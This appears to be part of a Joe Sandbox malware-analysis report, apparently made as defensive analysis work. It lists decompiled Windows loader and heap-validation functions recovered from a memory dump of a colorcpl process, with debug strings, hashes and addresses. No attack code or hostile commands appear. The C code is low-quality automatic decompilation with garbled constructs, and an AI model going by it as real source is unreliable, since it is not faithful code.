                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E59910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 14 6e59910-6e5991c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 785f125949586fda3ba0ad9729f9fb98b20012b1cadf0a2c9147950db33c8f03
                                                                                                • Instruction ID: e217d53d17af21db7a8b8319059f7bcfb2bba03225d7ba9a110c1b93001ff318
                                                                                                • Opcode Fuzzy Hash: 785f125949586fda3ba0ad9729f9fb98b20012b1cadf0a2c9147950db33c8f03
                                                                                                • Instruction Fuzzy Hash: 579002B134110802D180715B480574600099BD0381F91D011B5174954E8A998DD576A5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E5967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 6e5967a-6e5967f 1 6e59681-6e59688 0->1 2 6e5968f-6e59696 LdrInitializeThunk 0->2
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 0969d4615f7abe36c6b192b98e4e5a57307f92c94d7707739db6451e726b1847
                                                                                                • Instruction ID: 47b0196bf5faebb168c641a0383da8091d9693942496f085f1f5e23edb4a9d38
                                                                                                • Opcode Fuzzy Hash: 0969d4615f7abe36c6b192b98e4e5a57307f92c94d7707739db6451e726b1847
                                                                                                • Instruction Fuzzy Hash: 9BB02B71E012C5C5D640D3610A0871739007BC0340F13C011E1030640B077CC080F1F1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 06ECB260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 06ECB314
                                                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 06ECB484
                                                                                                • This failed because of error %Ix., xrefs: 06ECB446
                                                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 06ECB2DC
                                                                                                • <unknown>, xrefs: 06ECB27E, 06ECB2D1, 06ECB350, 06ECB399, 06ECB417, 06ECB48E
                                                                                                • an invalid address, %p, xrefs: 06ECB4CF
                                                                                                • The resource is owned exclusively by thread %p, xrefs: 06ECB374
                                                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 06ECB53F
                                                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 06ECB305
                                                                                                • *** then kb to get the faulting stack, xrefs: 06ECB51C
                                                                                                • Go determine why that thread has not released the critical section., xrefs: 06ECB3C5
                                                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 06ECB352
                                                                                                • *** enter .exr %p for the exception record, xrefs: 06ECB4F1
                                                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 06ECB476
                                                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 06ECB2F3
                                                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 06ECB47D
                                                                                                • The instruction at %p referenced memory at %p., xrefs: 06ECB432
                                                                                                • write to, xrefs: 06ECB4A6
                                                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 06ECB38F
                                                                                                • read from, xrefs: 06ECB4AD, 06ECB4B2
                                                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 06ECB48F
                                                                                                • a NULL pointer, xrefs: 06ECB4E0
                                                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 06ECB323
                                                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 06ECB3D6
                                                                                                • *** enter .cxr %p for the context, xrefs: 06ECB50D
                                                                                                • The resource is owned shared by %d threads, xrefs: 06ECB37E
                                                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 06ECB39B
                                                                                                • The instruction at %p tried to %s , xrefs: 06ECB4B6
                                                                                                • The critical section is owned by thread %p., xrefs: 06ECB3B9
                                                                                                • *** Inpage error in %ws:%s, xrefs: 06ECB418
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                • API String ID: 0-108210295
                                                                                                • Opcode ID: 972b5c9fe56c7922781932db46ff4c88777e625dc0e66230cc8a0b03ca56364b
                                                                                                • Instruction ID: 51b8cb721c872e8c190baeacda34c9b56b319b59f30069432f76982fff91182a
                                                                                                • Opcode Fuzzy Hash: 972b5c9fe56c7922781932db46ff4c88777e625dc0e66230cc8a0b03ca56364b
                                                                                                • Instruction Fuzzy Hash: A781F675A40310FFEBE56B45CD4AD7F3B2AAF46665F40A048F0046F192E2A1D493CBB2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06ED1C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 44%
                                                                                                			E06ED1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x6df48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E06E1B150();
				} else {
					E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x6f0589c);
				E06E1B150("Heap error detected at %p (heap handle %p)\n",  *0x6f058a0);
				_t27 =  *0x6f05898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M06ED1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E06E1B150();
				} else {
					E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E06E1B150("Error code: %d - %s\n",  *0x6f05898);
				_t113 =  *0x6f058a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E06E1B150();
					} else {
						E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E06E1B150("Parameter1: %p\n",  *0x6f058a4);
				}
				_t115 =  *0x6f058a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E06E1B150();
					} else {
						E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E06E1B150("Parameter2: %p\n",  *0x6f058a8);
				}
				_t117 =  *0x6f058ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E06E1B150();
					} else {
						E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E06E1B150("Parameter3: %p\n",  *0x6f058ac);
				}
				_t119 =  *0x6f058b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E06E1B150();
					} else {
						E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x6f058b4);
					E06E1B150("Last known valid blocks: before - %p, after - %p\n",  *0x6f058b0);
				} else {
					_t120 =  *0x6f058b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E06E1B150();
				} else {
					E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E06E1B150("Stack trace available at %p\n", 0x6f058c0);
			}











                                                                                                0x06ed1c10
                                                                                                0x06ed1c16
                                                                                                0x06ed1c1e
                                                                                                0x06ed1c3d
                                                                                                0x06ed1c3e
                                                                                                0x06ed1c20
                                                                                                0x06ed1c35
                                                                                                0x06ed1c3a
                                                                                                0x06ed1c44
                                                                                                0x06ed1c55
                                                                                                0x06ed1c5a
                                                                                                0x06ed1c65
                                                                                                0x06ed1c67
                                                                                                0x00000000
                                                                                                0x06ed1c6e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed1c67
                                                                                                0x06ed1cdc
                                                                                                0x06ed1ce5
                                                                                                0x06ed1d04
                                                                                                0x06ed1d05
                                                                                                0x06ed1ce7
                                                                                                0x06ed1cfc
                                                                                                0x06ed1d01
                                                                                                0x06ed1d0b
                                                                                                0x06ed1d17
                                                                                                0x06ed1d1f
                                                                                                0x06ed1d25
                                                                                                0x06ed1d30
                                                                                                0x06ed1d4f
                                                                                                0x06ed1d50
                                                                                                0x06ed1d32
                                                                                                0x06ed1d47
                                                                                                0x06ed1d4c
                                                                                                0x06ed1d61
                                                                                                0x06ed1d67
                                                                                                0x06ed1d68
                                                                                                0x06ed1d6e
                                                                                                0x06ed1d79
                                                                                                0x06ed1d98
                                                                                                0x06ed1d99
                                                                                                0x06ed1d7b
                                                                                                0x06ed1d90
                                                                                                0x06ed1d95
                                                                                                0x06ed1daa
                                                                                                0x06ed1db0
                                                                                                0x06ed1db1
                                                                                                0x06ed1db7
                                                                                                0x06ed1dc2
                                                                                                0x06ed1de1
                                                                                                0x06ed1de2
                                                                                                0x06ed1dc4
                                                                                                0x06ed1dd9
                                                                                                0x06ed1dde
                                                                                                0x06ed1df3
                                                                                                0x06ed1df9
                                                                                                0x06ed1dfa
                                                                                                0x06ed1e00
                                                                                                0x06ed1e0a
                                                                                                0x06ed1e13
                                                                                                0x06ed1e32
                                                                                                0x06ed1e33
                                                                                                0x06ed1e15
                                                                                                0x06ed1e2a
                                                                                                0x06ed1e2f
                                                                                                0x06ed1e39
                                                                                                0x06ed1e4a
                                                                                                0x06ed1e02
                                                                                                0x06ed1e02
                                                                                                0x06ed1e08
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed1e08
                                                                                                0x06ed1e5b
                                                                                                0x06ed1e7a
                                                                                                0x06ed1e7b
                                                                                                0x06ed1e5d
                                                                                                0x06ed1e72
                                                                                                0x06ed1e77
                                                                                                0x06ed1e95

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                • API String ID: 0-2897834094
                                                                                                • Opcode ID: d184fb4fd6dc065834f859a7421a30050bfefcba92a6198b1b9c5f301948fb53
                                                                                                • Instruction ID: 05bdb98c1741c15cc014fac1159368e9c45170d07864b0ab85c7c677e66e38af
                                                                                                • Opcode Fuzzy Hash: d184fb4fd6dc065834f859a7421a30050bfefcba92a6198b1b9c5f301948fb53
                                                                                                • Instruction Fuzzy Hash: 0B61F736A25384DFF3D59B84E885DA173E9EB0492170AB43AF9096F741C670DC86CE4A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06ED4AEF Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 59%
                                                                                                			E06ED4AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E06E1B150();
						} else {
							E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E06E1B150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E06E1B150();
					} else {
						E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E06ECFA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E06E1B150();
						} else {
							E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E06E1B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E06E1B150();
								} else {
									E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E06E1B150();
									} else {
										E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E06E1B150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E06ECFA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E06E1B150();
										} else {
											E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E06E6D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E06E1B150();
								} else {
									E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E06EDA80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E06E3E12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E06EDA80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E06E3E4A0(_t414, _t405, 1, _t94, _t309, _t380);
